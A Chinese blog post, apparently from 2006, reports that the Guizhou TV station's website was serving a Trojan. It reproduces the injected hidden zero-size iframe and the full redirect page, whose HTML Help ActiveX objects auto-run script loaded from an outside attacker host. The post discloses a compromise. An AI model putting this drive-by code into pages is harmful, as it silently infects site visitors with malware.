贵州电视台网站中了传奇木马

今天从朋友博客上看到贵州电视台(http://www.gzstv.com)的链接,于是就点击进去看看。
没想到被人挂了木马上去,唉~~~贵州的網絡安全人才到哪儿去了?[face09]

电视台主页面
2006-04-24_140939-0.jpg

瑞星报警
2006-04-24_140939-1.jpg

挂马的代码
2006-04-24_140939-2.jpg

加入的代码

<IFRAME marginWidth=0 marginHeight=0 src="http://www.0451wu.com/bbs/Skins/Default/css/test/image.htm" frameBorder=0 width=0 height=0></IFRAME>

打开http://www.0451wu.com/bbs/Skins/Default/css/test/image.htm之后又会转到这个链接
http://www.0451wu.com/bbs/Skins/Default/css/test/windows.htm

再一查看,发现windows.htm的代码如下

<SCRIPTlanguage=VScriptsrc="young.gif"></SCRIPT><SCRIPTlanguage=VScriptsrc="young.css"></SCRIPT><HTML><BODY><divstyle="display:none"><OBJECTid="news728"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAMname="Command"value="RelatedTopics,MENU"><PARAMname="Window"value="$global_ifl"><PARAMname="Item1"value='command;/windows/help/apps.chm');</OBJECT><OBJECTid="news683"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAMname="Command"value="RelatedTopics,MENU"><PARAMname="Window"value="$global_ifl"><PARAMname="Item1"value='command;javascript:if(1==1){eval("document.write(\"<SCRIPTlanguage=JScriptsrc=\\\"http://www.0451wu.com/bbs/Skins/Default/css/test/young.gif\\\"\"+String.fromCharCode(62)+\"</SCR\"+\"IPT\"+String.fromCharCode(62))")}'></OBJECT></div><SCRIPT>news728.Click();f1=1+1;f1=f1+2;setTimeout("news683.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>

通过挂马的网站来看,看来是一名东北人搞的咯~~

后来发邮件给电视台的台长信箱,没有回音!!晕!

昨天打了电话给百姓关注,我想百姓的事他们都关注,自己的事更是应该关注!

今天打开网站,找不到那些木马代码了~~5.11

发表评论

您的电子邮箱地址不会被公开。